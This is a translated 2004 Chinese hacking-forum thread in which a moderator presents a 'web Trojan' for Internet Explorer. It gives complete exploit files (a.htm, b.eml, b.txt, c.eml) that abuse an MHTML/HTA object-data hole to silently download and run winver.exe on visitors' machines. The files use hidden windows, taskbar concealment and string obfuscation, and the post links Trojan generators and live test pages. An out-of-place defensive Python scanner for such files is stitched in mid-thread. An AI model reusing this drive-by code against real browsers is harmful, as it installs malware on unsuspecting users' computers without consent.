Author: yimarong [yimarong] Moderator
Latest web Trojan -- extremely handy!!!!!

Comparison with several other Trojans that use the HTA hole:

Chen Jingtao's bmp2exe: this thing works under 98, but it runs a bit slowly, and the HTA window that pops up is far too obvious! Download: http://www.chinesehack.org/down/show.asp?id=4092

Dongsha's: the two in the Dongsha web Trojan generator only run under Win2K, because 98 does not have the adodb.stream control by default!!!! Download: http://www.chinesehack.org/down/show.asp?id=3989

Xfocus's: icefox's is only an example, not practical! http://www.xfocus.net/articles/200309/607.html

http://www.chinansl.com/czy/a.htm is the test page; it was only tested successfully on Win98 + IE5. It automatically downloads a winver.exe file from the web and runs it.

The code is below. Everyone have a look at what else needs changing; personally I think it is currently the best Trojan that exploits the HTA hole. In total it uses four objects: wscript.shell, Scripting.FileSystemObject, Microsoft.XMLHTTP, shell.application.

One goal now is to use as few objects as possible. wscript.shell can be dropped. The others apparently cannot be dropped; I originally wanted to use script.typelib instead of FSO, but that doesn't work. The new code at the very bottom uses only the shell.application object.

The other thing was wanting the little box in the taskbar to be completely hidden.... (This problem is now solved...) Set showintaskbar="no" on the HTA, and in the script use window.moveTo -100,-100.

---------------a.htm------------------------
<IE:Download ID="downloader" STYLE="behavior:url(#default#download)" />
<script>
function save(txt){var a='123';}
</script>
<script language=vbs>
a=navigator.appVersion
b=split(a,";")
for i=0 to ubound(b)
if trim(b(i))="Windows 98" then
'if it is Win98, download and install the backdoor
downloader.startDownload "winver.exe",save
document.write "<IFRAME SRC=b.eml><"&"/IFRAME>"
exit for
end if
next
</script>
-----------------------end-------------------

----b.eml-----------------------cut here-----------------------------
MIME-Version: 1.0
Content-Type: multipart/related; type="multipart/alternative"; boundary="1"

--1
Content-Type: multipart/alternative; boundary="2"

--2
Content-Type: text/html; charset="gb2312"
Content-Transfer-Encoding: quoted-printable

<HTML>
<HEAD>
<TITLE> IE Object Data 数据远程执行漏洞测试 </TITLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<CENTER><span datasrc=3D"#oExec" datafld=3D"exploit" dataformatas=3D"html"></span>
<xml id=3D"oExec">
<security>
<exploit>
<![CDATA[
<object id=3D"oFile" data=3Dcid:THE-CID></object>
]]>
</exploit>
</security>
</xml>
</CENTER>
</BODY>
</HTML>

--2--
--1
Content-Type: application/hta;
Content-Transfer-Encoding: 7bit
Content-ID: <THE-CID>

<html>
<HTA:APPLICATION caption="no" border="none"
windowState="minimize" visiable="no" showintaskbar="no">
<body>
<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
<script language="VBScript">
window.moveTo -100,-100
wsh.RegWrite "HKCR\.VBS\","vbsfile"
httpdoget "b.txt"
Function HttpDoGet(url)
set oReq = CreateObject("Microsoft.XMLHTTP")
oReq.open "GET",url,false
oReq.send
If oReq.status=200 then
HttpDoGet=oReq.responseTEXT
SaveFile HttpDoGet,"c:\win.vbs"
Set oReq=nothing
End if
End Function
sub SaveFile(str,fName)
Dim fso, tf
Set fso = CreateObject("Scripting.FileSystemObject")
Set tf = fso.CreateTextFile(fName, True)
tf.Write str
tf.Close
wsh.run "c:\win.vbs"
window.close
End sub
</script>
</body>
</html>

--1--
------------------------------end-----------b.eml-----------------

------b.txt---------------------cut here---------------------
Option Explicit
Dim shell,nettemp,fod,foditems,co,zitemp,co1,tpath,wsh
Set wsh = CreateObject("wscript.shell")
tpath=wsh.RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache")
On Error Resume Next
Set Shell = CreateObject("Shell.Application")
nettemp=tpath&"\Content.IE5\"
call temp()
function temp()
On Error Resume Next
set fod=Shell.Namespace(nettemp)
set foditems=fod.items
for each co in foditems
if co.size=0 then
'msgbox co.name
zi co.name
end if
next
end function
sub zi(zitemp)
On Error Resume Next
set fod=Shell.Namespace(nettemp&zitemp)
set foditems=fod.items
for each co1 in foditems
if left(co1.name,6)="winver" and right(co1.name,3)="exe" then
'msgbox co1.name
co1.InvokeVerb
exit sub
end if
next
end sub
-------------------------end------------b.txt-----------------

Changed the code again; it can now get by with a single shell control, haha.

Test: http://www.chinansl.com/czy/c.htm

---------------------------begin---------------c.eml-------------------
MIME-Version: 1.0
Content-Type: multipart/related; type="multipart/alternative"; boundary="1"

--1
Content-Type: multipart/alternative; boundary="2"

--2
Content-Type: text/html; charset="gb2312"
Content-Transfer-Encoding: quoted-printable

<HTML>
<HEAD>
</HEAD>
<BODY bgColor=3D#ffffff>
<CENTER>
<object style=3D"display:none" data=3Dcid:THE-CID height=3D0 width=3D0></object>
</CENTER>
</BODY>
</HTML>

--2--
--1
Content-Type: application/hta;
Content-Transfer-Encoding: 7bit
Content-ID: <THE-CID>

<html>
<HTA:APPLICATION caption="no" border="none" windowState="minimize" visiable="no" showintaskbar="no">
<body>
<script language="VBScript">
window.moveTo -100,-100
On Error Resume Next
Set Shell = CreateObject(StrReverse("NoitAcilppa.LLehs"))
nettemp="C:\WINDOWS\Temporary Internet Files\Content.IE5\"
call temp()
function temp()
On Error Resume Next
set fod=Shell.Namespace(nettemp)
set foditems=fod.items
for each co in foditems
if co.size=0 then
zi co.name
end if
next
end function
sub zi(zitemp)
On Error Resume Next
set fod=Shell.Namespace(nettemp&zitemp)
set foditems=fod.items
for each co1 in foditems
if left(co1.name,6)="winver" and right(co1.name,3)="exe" then
co1.InvokeVerb
window.close
end if
next
end sub
window.close
</script>
</body>
</html>

--1--
-----------------------------end-------------c.eml------------------

This amounts to a vulnerability collection; looking at it 10 years on, it is only nostalgia~
Original poster | Posted: 04-02-05 18:18
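A defender-side check, added here as an example and not part of the original post or of any of the tools it links: it parses an MHTML/.eml file with Python's standard `email` module and flags every HTML part whose `<object data=cid:...>` points at a part served as `application/hta`, which is exactly the structure b.eml and c.eml above rely on to get an HTA loaded from a web page. The two sample messages are constructed with placeholder bodies (no script), and the function and regex names are my own.

```python
import email
import re

# Constructed sample: same multipart/related layout as the b.eml/c.eml files in the
# post, but the HTA part is a harmless placeholder.
SAMPLE_EML = """\
MIME-Version: 1.0
Content-Type: multipart/related; type="multipart/alternative"; boundary="1"

--1
Content-Type: multipart/alternative; boundary="2"

--2
Content-Type: text/html; charset="gb2312"
Content-Transfer-Encoding: quoted-printable

<HTML><BODY bgColor=3D#ffffff>
<object style=3D"display:none" data=3Dcid:THE-CID height=3D0 width=3D0></object>
</BODY></HTML>

--2--
--1
Content-Type: application/hta;
Content-Transfer-Encoding: 7bit
Content-ID: <THE-CID>

<html><body>placeholder (constructed sample, no script)</body></html>

--1--
"""

# Constructed benign sample: the cid reference points at an image part instead.
BENIGN_EML = """\
MIME-Version: 1.0
Content-Type: multipart/related; boundary="1"

--1
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit

<html><body><object data="cid:logo" type="image/gif"></object></body></html>

--1
Content-Type: image/gif
Content-Transfer-Encoding: 7bit
Content-ID: <logo>

GIF89a placeholder bytes (constructed)

--1--
"""

# Matches <object ... data=cid:XYZ ...> with or without quotes around the URL.
OBJECT_CID_RE = re.compile(
    r'<object\b[^>]*\bdata\s*=\s*["\']?cid:([^"\'\s>]+)', re.IGNORECASE
)

# Part types that should never be the target of an <object data=cid:> reference.
RISKY_TYPES = {"application/hta"}


def scan_mhtml(raw):
    """Return [(cid, content_type)] for each object reference to a risky MIME part."""
    msg = email.message_from_string(raw)

    # First pass: map Content-ID -> declared content type of every leaf part.
    type_by_cid = {}
    for part in msg.walk():
        if part.is_multipart():
            continue
        cid = (part.get("Content-ID") or "").strip().strip("<>")
        if cid:
            type_by_cid[cid] = part.get_content_type()

    # Second pass: decode each HTML part (handles quoted-printable/base64) and
    # resolve every cid: object reference against the map. The regex works on
    # the raw text, so a reference wrapped in an XML island/CDATA block, as in
    # b.eml above, is still seen.
    findings = []
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        charset = part.get_content_charset() or "latin-1"
        body = part.get_payload(decode=True).decode(charset, "replace")
        for match in OBJECT_CID_RE.finditer(body):
            cid = match.group(1)
            ctype = type_by_cid.get(cid)
            if ctype in RISKY_TYPES:
                findings.append((cid, ctype))
    return findings


if __name__ == "__main__":
    for name, sample in (("sample", SAMPLE_EML), ("benign", BENIGN_EML)):
        print(name, scan_mhtml(sample))
```

Because the check keys on the declared content type of the referenced part rather than on any particular script text, renaming variables or reversing strings (as c.eml does with StrReverse) does not evade it; a deployment would extend RISKY_TYPES with whatever other active content types the local policy forbids.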
Reply: NetPolaris [newmyth21] Forum user
Good post, bumped.
Floor B1 | Posted: 04-02-05 18:51

Reply: yimarong [yimarong] Moderator
Heh~ with Brother Yuan around, Zhonglian sure has plenty of practical talent!
Floor B2 | Posted: 04-02-05 19:48

Reply: hudou [hudou] Forum user
We really need technical articles like this.
Floor B3 | Posted: 04-02-05 19:50

Reply: bailove [bailove] Forum user
Bump.
Floor B4 | Posted: 04-02-05 20:53

Reply: yimarong [yimarong] Moderator
Heh~ keep bumping~
Floor B5 | Posted: 04-02-07 14:39
Copyright 20CN Network Security Group
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
Forum software written by: NetDemon
ICP filing: 粤ICP备05087286号